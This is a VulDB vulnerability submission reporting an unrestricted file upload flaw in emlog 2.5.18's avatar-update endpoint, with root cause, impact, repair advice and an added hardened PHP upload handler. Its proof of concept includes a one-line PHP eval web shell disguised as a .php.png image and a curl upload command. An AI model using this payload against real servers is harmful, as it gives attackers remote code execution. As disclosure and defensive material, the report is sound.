Submission #631923: emlog.net Emlog 2.5.18 Unrestricted Upload (Info)

Title: emlog.net Emlog 2.5.18 Unrestricted Upload
Description:

# Projectworlds emlog Project V2.5.18 /admin/blogger.php?action=update_avatar File unrestricted upload

# NAME OF AFFECTED PRODUCT(S)
- emlog

## Vendor Homepage
- emlog.net

# AFFECTED AND/OR FIXED VERSION(S)

## submitter
- l1nk

## Vulnerable File
- /admin/blogger.php?action=update_avatar

## VERSION(S)
- V2.5.18

## Software Link
- https://www.emlog.net/

# PROBLEM TYPE

## Vulnerability Type
- File unrestricted upload

## Root Cause
- A file unrestricted upload vulnerability was found in the '/admin/blogger.php?action=update_avatar' file of the 'emlog' project. The reason for this issue is that attackers can upload arbitrary files (including malicious scripts) through the parameter without proper verification of file type, size, content, or storage path, allowing them to execute malicious code on the server and perform unauthorized operations.

## Impact
- Attackers can exploit this file unrestricted upload vulnerability to upload malicious scripts (such as PHP, JSP, ASP files), gain server control, access or tamper with sensitive data, spread malware, and even cause service paralysis, posing a severe threat to system security and data confidentiality.

# DESCRIPTION
- During the security review of "emlog", I discovered a critical file unrestricted upload vulnerability in the "/admin/blogger.php?action=update_avatar" file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity.

# No login or authorization is required to exploit this vulnerability

# Vulnerability details and POC

## Vulnerability location:
- /admin/blogger.php?action=update_avatar

## Payload:

```http
-----------------------------64766223829550656241846266132
Content-Disposition: form-data; name="image"; filename="渗透流程.php.png"
Content-Type: image/png

<?php @eval($_POST['shell']); ?>
-----------------------------64766223829550656241846266132
```

## The following are screenshots of some specific information obtained from testing file uploads:

```bash
《curl -X POST -F "[email protected]" http://10.20.33.16/admin/blogger.php?action=update_avatar》
```

<img width="2010" height="1110" alt="Image" src="https://github.com/user-attachments/assets/25e9f191-f19d-4d96-bdfd-5323f8c11ddc" />
<img width="1266" height="574" alt="Image" src="https://github.com/user-attachments/assets/e71d722c-2e9e-4d5e-8174-9c5715ff7a51" />

# Suggested repair

1. **Strict file type verification:** Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded.
2. **Set file size limits:** Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes.
3. **Store files outside the web root directory:** Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files.
4. **Rename uploaded files:** Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness.
5. **Regular security audits:** Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner.
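The five repair steps in the submission above, carried out as one hardened PHP avatar-upload handler. This is an added example, not emlog's code and not the submitter's: the `storeAvatar` and `serveAvatar` functions, the `UPLOAD_DIR` path and the 2 MiB cap are assumptions, and the handler assumes the caller has already enforced an authenticated admin session (the report notes the vulnerable endpoint required none).

```php
<?php
// Hardened avatar-upload handler (added example; not emlog's own code).
// Assumptions: $_FILES['image'] carries the upload, the caller has already
// verified the admin session, and UPLOAD_DIR is a directory outside the web
// root that is writable by the PHP process and never executed by the server.
declare(strict_types=1);

const MAX_AVATAR_BYTES = 2 * 1024 * 1024;           // step 2: 2 MiB cap (assumed value)
const UPLOAD_DIR       = '/var/lib/emlog-avatars';  // step 3: outside web root (assumed path)
const ALLOWED_TYPES    = [                          // step 1: extension chosen by sniffed MIME type
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one uploaded file and store it in UPLOAD_DIR under a random name.
 * Returns the stored basename, or throws RuntimeException on any check failure.
 */
function storeAvatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . (int) $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a PHP-managed upload');
    }

    // Step 2: enforce the size limit server-side from the temp file, not from client headers.
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > MAX_AVATAR_BYTES) {
        throw new RuntimeException('file size out of range');
    }

    // Step 1: sniff the content; ignore the client's Content-Type and filename entirely.
    // A body that starts with "<?php" is identified as text, not as image/png, and is rejected.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('disallowed content type: ' . $mime);
    }
    // Second opinion: a genuine raster image must decode to non-zero dimensions.
    $dims = @getimagesize($file['tmp_name']);
    if ($dims === false || $dims[0] < 1 || $dims[1] < 1) {
        throw new RuntimeException('file is not a decodable image');
    }

    // Step 4: server-chosen random name; the extension comes from the sniffed type,
    // so "x.php.png" can never be stored under a name containing "php".
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // data, not code: no execute bit
    return $name;
}

/**
 * Step 3: deliver a stored avatar through a script, so nothing in UPLOAD_DIR is
 * ever reachable as a URL. Only names produced by storeAvatar() are accepted,
 * which also rules out path traversal in the lookup.
 */
function serveAvatar(string $name): void
{
    if (!preg_match('/^[0-9a-f]{32}\.(jpg|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $mime = array_search(pathinfo($name, PATHINFO_EXTENSION), ALLOWED_TYPES, true);
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Usage inside an admin-only endpoint (after the session check):
// try { echo storeAvatar($_FILES['image']); }
// catch (RuntimeException $e) { http_response_code(400); echo 'upload rejected'; }
```

Content sniffing (step 1) is the weakest of the five on its own: a file with a valid image header and script text appended still passes `finfo` and `getimagesize`. What makes such a file harmless here is steps 3 and 4 together, storage in a directory the web server never executes or exposes, a server-chosen name with an extension derived from the detected type, and delivery by a script that fixes the Content-Type. Pair this with a web-server rule that disables script execution in any upload directory, and audit that rule as part of step 5.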
Source: https://github.com/lan041221/cvec/issues/8
User: l1nk (UID 76857)
Submitted: 11/08/2025 15:40 (9 months ago)
Moderated: 21/08/2025 07:18 (10 days later)
Status: accepted
VulDB Entry: 320901 [Emlog Pro up to 2.5.18 blogger.php?action=update_avatar image privilege escalation]
Points: 20
